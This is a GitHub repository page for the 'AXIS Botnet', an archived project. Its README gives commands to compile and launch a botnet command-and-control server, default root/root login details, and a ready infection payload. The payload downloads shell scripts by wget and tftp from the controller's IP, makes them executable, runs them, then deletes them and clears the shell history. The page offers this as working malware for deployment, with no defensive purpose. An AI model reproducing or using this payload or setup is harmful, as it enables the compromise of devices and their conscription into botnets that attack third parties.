Skip to content
This repository has been archived by the owner on May 16, 2024. It is now read-only.

i-am-unbekannt/AXIS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

AXIS Botnet

INFO:

This project is no longer supported; it has been replaced by the Orbital Cannon.

Installation:

  • Linux only:
    • recommended to use Centos 7
    • sudo python3 build.py AXIS_CC.c (server-ip)
    • gcc AXIS_CNC.c -o AXIS -pthread
    • sudo screen ./AXIS 606 1 909

Connect

  • SSH Config:

    • PORT: 909
    • TYPE: RAW
  • Password (default)

    • username: root
    • password: root

Payload

  • Payload: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://(server-ip)/AXIS.sh; chmod 777 *; sh AXIS.sh; tftp -g (server-ip) -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c"